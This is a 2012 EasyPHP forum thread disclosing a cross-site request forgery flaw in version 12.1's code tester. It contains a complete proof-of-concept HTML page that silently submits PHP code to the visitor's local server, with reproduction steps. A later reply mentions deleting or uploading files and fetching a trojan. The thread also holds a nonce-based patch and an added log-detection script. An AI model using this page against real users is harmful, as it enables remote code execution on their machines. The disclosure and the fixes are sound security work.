FORUM
We will close this forum soon. Please, now use Stack Overflow. Don't forget to add the tag "easyphp" to your post.

You can follow your activity on Stack Overflow with the Stack Exchange Android App. An iPhone version is coming...

One more thing. EasyPHP is on GitHub. You will find the repositories at this address : https://github.com/easyphp. If you want to report a bug, please use the GitHub issue management system of each repository.

12.1 security vulnerability, remote execution of php/js, full compromise of your PC!



Posted by: o2326570
October 23, 2012 02:17PM
Copy below code as "whatever.html" (replace "hxxp" with "http") to some remote server and browse the page with your browser while EasyPHP is running locally.

The page will execute php and javascript on your local server.

With this your PC can be fully compromised, endless possibilities.

Quick fix: Rename or delete ..\EasyPHP-12.1\home\codetester.php

Real fix: Add a nonce[1] to codetester.php or only allow from local host.

[1] [en.wikipedia.org]

[2] whatever.html:
<html>
<head>
<title>EasyPHP 12.1 remote access</title>
</head>
<body onload="window.document.forms[0].submit();">
Some innocent page...
<form action="hxxp://127.0.0.1/home/codetester.php" method="post" target="easyphp" style="display:none;">
<textarea name="sourcecode">
<?php
phpinfo();
echo '<scr'.'ipt type="text/javascript">alert("pwned, php executed on your EasyPHP server")<'.'/scr'.'ipt>';
?>
</textarea>
<input type="hidden" name="to" value="interpretcode">
<input type="submit" value="pwn">
</form>
<iframe name="easyphp" src="about:blank" style="display:none;"></iframe>
</body>
</html>
Posted by: _Thierry_
October 24, 2012 01:46PM
No remote execution, Apache is listening only on localhost.
Posted by: o2326570
October 24, 2012 02:21PM
Obviously you did not understand or try the supplied PoC code "whatever.html"

The page "whatever.html" executes php code on your localhost.

If EasyPHP 12.1 is running on your PC and you visit a page like "whatever.html" on some server on the internet with your browser, you are pwned.
Posted by: _Thierry_
October 25, 2012 12:43PM
OK, looks serious even though I can't reproduce it with my remote server and/or my browser. Please send me an email for further messages.

thierry at easyphp dot org
Posted by: o2326570
October 25, 2012 04:35PM
Works everywhere:

1. Copy above html (replace "hxxp" with "http") to file "whatever.html"
2. Upload to example.com/whatever.html
3. Start EasyPHP 12.1
4. Start your browser (Tested: Firefox latest, Chrome latest, IE7 on Windows XP)
5. Make sure that JavaScript is enabled in browser
6. Open example.com/whatever.html in browser
7. A popup appears: "pwned, php executed on your EasyPHP server"
Options: ReplyQuote
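The request produced by the steps above reaches Apache from 127.0.0.1, because the visitor's own browser sends it, so the access log is where a defender can tell it apart from normal use of the code tester. The following is an added example, not part of the original thread: it assumes Apache's "combined" log format and that the browser sent a Referer header, and the log lines in it are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Assumption: Apache "combined" LogFormat. The path is the one named in the thread.
LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
LOCAL_HOSTS = {"127.0.0.1", "localhost", "::1"}
TARGET = "/home/codetester.php"

# Constructed sample lines (not taken from a real server).
SAMPLE_LOG = [
    '127.0.0.1 - - [25/Oct/2012:16:35:02 +0200] "POST /home/codetester.php HTTP/1.1" 200 5120 "http://127.0.0.1/home/index.php" "Mozilla/5.0"',
    '127.0.0.1 - - [25/Oct/2012:16:36:10 +0200] "POST /home/codetester.php HTTP/1.1" 200 5120 "http://example.com/whatever.html" "Mozilla/5.0"',
    '127.0.0.1 - - [25/Oct/2012:16:36:11 +0200] "GET /home/codesource.php HTTP/1.1" 200 48211 "http://127.0.0.1/home/codetester.php" "Mozilla/5.0"',
    '127.0.0.1 - - [25/Oct/2012:16:40:00 +0200] "POST /home/CodeTester.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]


def referer_host(referer):
    """Return the lower-cased Referer host, or None if absent or unparsable."""
    try:
        host = urlsplit(referer).hostname
    except ValueError:
        host = None
    return host.lower() if host else None


def cross_site_posts(lines):
    """Return (timestamp, referer, reason) for POSTs to the code tester
    that were not submitted from a page served by the local server."""
    findings = []
    for line in lines:
        m = LINE.match(line.strip())
        if not m or m["method"] != "POST":
            continue
        # Windows file systems are case-insensitive, so normalise the path.
        if unquote(urlsplit(m["path"]).path).lower() != TARGET:
            continue
        host = referer_host(m["referer"])
        if host is None:
            findings.append((m["ts"], m["referer"], "missing or unparsable Referer"))
        elif host not in LOCAL_HOSTS:
            findings.append((m["ts"], m["referer"], "cross-site Referer"))
    return findings


if __name__ == "__main__":
    for ts, ref, reason in cross_site_posts(SAMPLE_LOG):
        print(ts, reason, ref)
```

Every sample line has 127.0.0.1 as the client address, which is why the client address alone cannot separate the cross-site submission from a local one.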
Posted by: o2326570
October 30, 2012 06:13PM
When will you release a fix?

Will publish the bug on Full Disclosure Mailing List on 01. Nov. 2012
Posted by: Russell
November 09, 2012 09:46PM
If anyone's concerned by this and wants a quick fix (without deleting the content of codetester.php), I've knocked up what I think should do the job until the EasyPHP team release a fix:

In codetester.php, change the first block of php to be:

include("i18n.inc.php");
include("functions.inc.php");
// Mod - lockdown the code tester to prevent remote exploits
session_start();

if (isset($_POST['to']) AND $_POST['to'] == "interpretcode") {
    file_put_contents('codesource.php',
        verify_nonce() ? $_POST['sourcecode'] : 'Detected an invalid submit, maybe an exploit attempt.');
}


Then further down in the file, find the line:

<input type="hidden" name="to" value="interpretcode" />

directly underneath it add the following line:

<input type="hidden" name="nonce" value="<?php echo get_nonce(); ?>" />



In index.php, we need to add the hidden input element for the nonce again, find the line:

<input type="hidden" name="to" value="interpretcode" />

directly beneath it add the line:

<input type="hidden" name="nonce" value="<?php echo get_nonce(); ?>" />



Finally in the functions.inc.php

Add the following function to the bottom of the php block (make sure it's after the final "}" but before the "?>"):

//Mod - lockdown the code tester to prevent remote exploits
function get_nonce() {
    $nonce = isset($_SESSION['nonce']) ? $_SESSION['nonce'] : hash('sha512', get_random_string());
    $_SESSION['nonce'] = $nonce;
    return $nonce;
}
function remove_nonce() {
    unset($_SESSION['nonce']); //Remove the nonce from being used again!
}
function verify_nonce() {
    $nonce = get_nonce(); // Fetch the nonce from the last request
    remove_nonce(); // clear it so it can't be used again now we have it locally
    session_regenerate_id(true); // replace old session, stops session fixation
    // only verify if nonce is sent and matches what is expected
    // (strict comparison, so numeric-looking hash strings are not loosely equal)
    return (isset($_POST['nonce']) AND $_POST['nonce'] === $nonce);
}
function get_random_string()
{
    $random_string = array();
    for ($index = 0; $index < 32; $index++)
    {
        //ascii chars 32 - 126 are printable (127 is DEL)
        $random_string[] = chr(mt_rand(32, 126));
    }
    return implode($random_string);
}


It's not perfect but it does work and will stop o2326570 from creating a popup on your PC, naughty hacker! ;-)

PS - this site removed the indenting, sorry.
Posted by: o2326570
November 10, 2012 11:54AM
Russell Wrote:
-------------------------------------------------------
> It's not perfect but it does work and will stop
> o2326570 from creating a popup on your PC, naughty
> hacker! ;-)

For interested readers, instead of creating a popup it would be actually very easy to just silently delete all your files in the "My Documents" folder or upload them to some remote folder or download and start some hxxp://example.com/trojan.exe or whatever...

Thanks for providing a fix, Russell, the authors of EasyPHP obviously don't care...
Posted by: Russell
November 10, 2012 04:12PM
o2326570,

I didn't mean to suggest all you can do is make popups. You're completely right about the potential for exploits.

The little ascii wink face was a nod to you.

Everyone else,

Since the rain has spoiled my plans for the afternoon, I've hosted the mod on github for anyone who isn't confident making the mod manually: [github.com]

Back up your EasyPHP-12.1/home directory before copying these files over (just in case), then just pull/download from github and copy into the EasyPHP-12.1/home directory. For those without git, use the "ZIP" button near the top of the page.

Russell
Posted by: hansfn
November 23, 2012 09:28AM
This is indeed very serious. I'm very surprised that the EasyPHP developers haven't fixed this and made a new release a long time ago. Today it's one month since this thread was started.

I can of course reproduce the issue and I can verify that the nonce-implementation from Russell stops exploits - thx, Russell.

With the code already there, the only thing needed is to repackage the 12.1 release - nothing to wait for developers.
Posted by: o2326570
November 30, 2012 11:58AM
Seems the developers just don't care.

Or maybe the developers don't know anything about security.

Conclusion in either case: Better think twice before using a software from developers like this. There are alternatives...
Posted by: Thierry
November 30, 2012 08:20PM
And what do you care about when you publish (here) an exploit?

Yes, we have responsibility, but not enough time to make a new release.
But you also probably know the "white hat" ethic:
- signal to publisher
- if no reply, publish about the failure. But never an exploit code.

This failure will never be used by real hackers because it's better to find something in Acrobat or other widespread software.

You're right, it's a failure. You're wrong, it's not so important and you don't follow rules.


So stop crying, kiddy.



Edited 1 time(s). Last edit at 11/30/2012 08:22PM by Thierry.